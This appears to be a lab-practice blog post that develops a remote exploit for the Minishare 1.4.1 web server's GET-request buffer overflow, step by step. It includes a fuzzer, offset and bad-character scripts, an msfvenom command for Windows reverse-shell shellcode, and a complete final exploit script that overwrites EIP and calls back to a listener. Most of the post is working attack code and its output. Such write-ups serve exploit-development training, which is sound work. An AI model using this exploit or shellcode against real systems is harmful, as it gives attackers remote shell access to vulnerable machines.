Minishare 1.4.1 Buffer Overflow Exploitation

After I have rooted all the machines in OSCP PWK Labs, I started to work on buffer overflow exploits using various vulnerable softwares like Minishare 1.4.1, Freefloat FTP server. These were simple Vanilla exploitations. This post ll cover the steps taken to exploit Minishare 1.4.1 based on the buffer overflow vulnerability in the GET HTTP Request as described in CVE-2004-2271.

Requirements for Exploitation:

  1. Windows XP SP3 64 bit.
  2. Immunity Debugger installed in above machine.
  3. Mona.py installed with Immunity Debugger.
  4. Download Vulnerable Minishare (Download Link).
  5. Kali Machine.

 Steps involved in Exploitation:

  1. Fuzzing
  2. Finding Offset
  3. Search for Bad Characters
  4. JMP ESP Instruction
  5. Shellcode
  6. Exploitation

Fuzzing:

In this step, we develop a fuzzer based on buffer overflow vulnerability in “HTTP GET Request” in vulnerable software. The following Python script “minishare_fuzz.py” is used to send the buffer to Minishare till it crashes the system.

#Minishare Fuzzing Program; Crashing the software to get buffer length

import socket

#Fuzzing in GET Parameter
pre_buff="GET "
buff =""
end_buff=" HTTP/1.1\r\n\r\n"

#Fuzzing loop
while True:
    buff = buff+"\x41"*100
    final_buff = pre_buff+buff+end_buff
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(('192.168.116.131',80))
        print "Trying with buffer length %d" % len(buff)
        sock.send(final_buff)
        sock.recv(1024)
        sock.close()
    except:
        print "Server crashed with buffer length %d" % len(buff)
        exit()
$root@kali:~# python minishare_fuzz.py 
Trying with buffer length 100
Trying with buffer length 200
Trying with buffer length 300
...
Trying with buffer length 1600
Trying with buffer length 1700
Trying with buffer length 1800
Server crashed with buffer length 1800

We observe that after sending a buffer of 1800 ‘\x41’ (Hex of ‘A’), the server crashed. This step can be done with Immunity Debugger attached. Start Minishare and attach the process to Immunity Debugger and keep it in running mode. Since we already know the size of buffer needed to crash the system. We directly send the buffer of 1800 length as “HTTP GET” Request to crash the system and analyze in Immunity Debugger using ‘curl’.

$root@kali:~# curl http://192.168.116.131/`python -c "print 'A'*1800"`

We can see an error and EIP is overwritten by 414141.

Finding Offset

Here, we try to find the exact position of the buffer that overwrites EIP. In this step, we make use of ‘pattern_create.rb’ ruby script under Metasploit framework to generate a unique pattern of 1800 length.

$root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1800
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9

Back to Python scripting!! Sending the unique pattern using the script minishare_offset.py  as follows:

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.116.131',80))
pre_buff = "GET "
buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9"
end_buff=" HTTP/1.1\r\n\r\n"
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

Start Minishare and attach it in Immunity Debugger.
Run the script minishare_offset.py

$root@kali:~# python minishare_offset.py 

EIP is overwritten with 36684335. To find the offset, ‘pattern_offset.rb’ of Metasploit framework is used.

$root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1800 -q 36684335
[*] Exact match at offset 1787

Confirming the offset with the following modified minishare_offset.py

import socket
sock  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.116.131',80))
pre_buff="GET "
buff = "A"*1787 +"B"*4 + "C"*400
end_buff=" HTTP/1.1\r\n\r\n"
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

Starting Minishare and attaching it to Immunity Debugger. Executing the above script shows


EIP is overwritten with 42424242 (Hex value of B)  and ESP is pointed to start of 400 C’s

Search for Bad Characters

In this exploit development process, this step is used to avoid any bad characters that are to be eliminated in building the final exploit. In other words, these bad characters should not be present in the final exploit.  The approach is to pass all the hex values as follows and find any character that breaks the sequence of the list.

bad = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

We add this list after 4 B’s and understand the behavior in Immunity Debugger. I modified the above minishare_offset.py to minishare_bad.py

import socket
sock  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.116.131',80))
pre_buff="GET "
buff = "A"*1787 +"B"*4 

bad = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buff = buff+bad
end_buff=" HTTP/1.1\r\n\r\n"
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

Running it to crash the Minishare attached to Immunity Debugger.

We can see ‘\x00’ is truncated when ESP is followed in the dump at 01693908. Removing that from ‘bad’ variable in script minishare_bad.py and repeating the process.

Now in the sequence 0A 0B 0C, 0D is truncated. Hence \x00 and \x0D are bad characters. Removing \x0D and repeating the process to get all the other characters shown.

JMP ESP Instruction

In this step, we find a memory address where JMP ESP Instruction is stored so that we control EIP to execute the instruction stored at ESP, generally shellcode to remotely connect to the target system. I have used mona.py to inspect modules and their properties.

I am taking the help of SHELL32.dll in this case and trying to find JMP ESP instruction

I took the very first one ‘0x7cb32d69’ that ‘ll be used in exploitation to control EIP

Shellcode 

Shellcode can be generated using ‘msfvenom’ to get a reverse shell.

$root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.136 LPORT=443 -b "\x00\x0d" -f python
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1684 bytes
buf =  ""
buf += "\xb8\xb3\xd0\x2f\x15\xd9\xe1\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x52\x31\x47\x12\x03\x47\x12\x83\x5c\x2c\xcd"
buf += "\xe0\x5e\x25\x90\x0b\x9e\xb6\xf5\x82\x7b\x87\x35\xf0"
buf += "\x08\xb8\x85\x72\x5c\x35\x6d\xd6\x74\xce\x03\xff\x7b"
buf += "\x67\xa9\xd9\xb2\x78\x82\x1a\xd5\xfa\xd9\x4e\x35\xc2"
buf += "\x11\x83\x34\x03\x4f\x6e\x64\xdc\x1b\xdd\x98\x69\x51"
buf += "\xde\x13\x21\x77\x66\xc0\xf2\x76\x47\x57\x88\x20\x47"
buf += "\x56\x5d\x59\xce\x40\x82\x64\x98\xfb\x70\x12\x1b\x2d"
buf += "\x49\xdb\xb0\x10\x65\x2e\xc8\x55\x42\xd1\xbf\xaf\xb0"
buf += "\x6c\xb8\x74\xca\xaa\x4d\x6e\x6c\x38\xf5\x4a\x8c\xed"
buf += "\x60\x19\x82\x5a\xe6\x45\x87\x5d\x2b\xfe\xb3\xd6\xca"
buf += "\xd0\x35\xac\xe8\xf4\x1e\x76\x90\xad\xfa\xd9\xad\xad"
buf += "\xa4\x86\x0b\xa6\x49\xd2\x21\xe5\x05\x17\x08\x15\xd6"
buf += "\x3f\x1b\x66\xe4\xe0\xb7\xe0\x44\x68\x1e\xf7\xab\x43"
buf += "\xe6\x67\x52\x6c\x17\xae\x91\x38\x47\xd8\x30\x41\x0c"
buf += "\x18\xbc\x94\x83\x48\x12\x47\x64\x38\xd2\x37\x0c\x52"
buf += "\xdd\x68\x2c\x5d\x37\x01\xc7\xa4\xd0\xee\xb0\xd2\xa8"
buf += "\x87\xc2\x1a\xa8\xec\x4a\xfc\xc0\x02\x1b\x57\x7d\xba"
buf += "\x06\x23\x1c\x43\x9d\x4e\x1e\xcf\x12\xaf\xd1\x38\x5e"
buf += "\xa3\x86\xc8\x15\x99\x01\xd6\x83\xb5\xce\x45\x48\x45"
buf += "\x98\x75\xc7\x12\xcd\x48\x1e\xf6\xe3\xf3\x88\xe4\xf9"
buf += "\x62\xf2\xac\x25\x57\xfd\x2d\xab\xe3\xd9\x3d\x75\xeb"
buf += "\x65\x69\x29\xba\x33\xc7\x8f\x14\xf2\xb1\x59\xca\x5c"
buf += "\x55\x1f\x20\x5f\x23\x20\x6d\x29\xcb\x91\xd8\x6c\xf4"
buf += "\x1e\x8d\x78\x8d\x42\x2d\x86\x44\xc7\x5d\xcd\xc4\x6e"
buf += "\xf6\x88\x9d\x32\x9b\x2a\x48\x70\xa2\xa8\x78\x09\x51"
buf += "\xb0\x09\x0c\x1d\x76\xe2\x7c\x0e\x13\x04\xd2\x2f\x36"

Exploitation:

Using the JMP Instruction address we got and shellcode generated the final exploit minishare_exploit is created as follows:

import socket
sock  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.116.131',80))
pre_buff="GET "
buf =  ""
buf += "\xdb\xc9\xd9\x74\x24\xf4\xbd\xc3\xad\x95\x98\x5e\x29"
buf += "\xc9\xb1\x52\x31\x6e\x17\x83\xc6\x04\x03\xad\xbe\x77"
buf += "\x6d\xcd\x29\xf5\x8e\x2d\xaa\x9a\x07\xc8\x9b\x9a\x7c"
buf += "\x99\x8c\x2a\xf6\xcf\x20\xc0\x5a\xfb\xb3\xa4\x72\x0c"
buf += "\x73\x02\xa5\x23\x84\x3f\x95\x22\x06\x42\xca\x84\x37"
buf += "\x8d\x1f\xc5\x70\xf0\xd2\x97\x29\x7e\x40\x07\x5d\xca"
buf += "\x59\xac\x2d\xda\xd9\x51\xe5\xdd\xc8\xc4\x7d\x84\xca"
buf += "\xe7\x52\xbc\x42\xff\xb7\xf9\x1d\x74\x03\x75\x9c\x5c"
buf += "\x5d\x76\x33\xa1\x51\x85\x4d\xe6\x56\x76\x38\x1e\xa5"
buf += "\x0b\x3b\xe5\xd7\xd7\xce\xfd\x70\x93\x69\xd9\x81\x70"
buf += "\xef\xaa\x8e\x3d\x7b\xf4\x92\xc0\xa8\x8f\xaf\x49\x4f"
buf += "\x5f\x26\x09\x74\x7b\x62\xc9\x15\xda\xce\xbc\x2a\x3c"
buf += "\xb1\x61\x8f\x37\x5c\x75\xa2\x1a\x09\xba\x8f\xa4\xc9"
buf += "\xd4\x98\xd7\xfb\x7b\x33\x7f\xb0\xf4\x9d\x78\xb7\x2e"
buf += "\x59\x16\x46\xd1\x9a\x3f\x8d\x85\xca\x57\x24\xa6\x80"
buf += "\xa7\xc9\x73\x06\xf7\x65\x2c\xe7\xa7\xc5\x9c\x8f\xad"
buf += "\xc9\xc3\xb0\xce\x03\x6c\x5a\x35\xc4\x53\x33\x41\x9c"
buf += "\x3c\x46\xa9\x9d\x07\xcf\x4f\xf7\x67\x86\xd8\x60\x11"
buf += "\x83\x92\x11\xde\x19\xdf\x12\x54\xae\x20\xdc\x9d\xdb"
buf += "\x32\x89\x6d\x96\x68\x1c\x71\x0c\x04\xc2\xe0\xcb\xd4"
buf += "\x8d\x18\x44\x83\xda\xef\x9d\x41\xf7\x56\x34\x77\x0a"
buf += "\x0e\x7f\x33\xd1\xf3\x7e\xba\x94\x48\xa5\xac\x60\x50"
buf += "\xe1\x98\x3c\x07\xbf\x76\xfb\xf1\x71\x20\x55\xad\xdb"
buf += "\xa4\x20\x9d\xdb\xb2\x2c\xc8\xad\x5a\x9c\xa5\xeb\x65"
buf += "\x11\x22\xfc\x1e\x4f\xd2\x03\xf5\xcb\xe2\x49\x57\x7d"
buf += "\x6b\x14\x02\x3f\xf6\xa7\xf9\x7c\x0f\x24\x0b\xfd\xf4"
buf += "\x34\x7e\xf8\xb1\xf2\x93\x70\xa9\x96\x93\x27\xca\xb2"
end_buff=" HTTP/1.1\r\n\r\n"
#Return address 7xb32d69 is written like that because of little endian
buff = "A"*1787 + "\x69\x2d\xb3\x7c"+"\x90"*20+buf 
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

The shellcode is prefixed with 20 NOPs (“\x90”). Start Minishare and attach it to the debugger. Setup Netcat listener at port 443.

$root@kali:~# nc -nlvp 443

Run the python script to get reverse shell

You can try to exploit again once without Immunity Debugger attached!!

Leave a Reply

Your email address will not be published. Required fields are marked *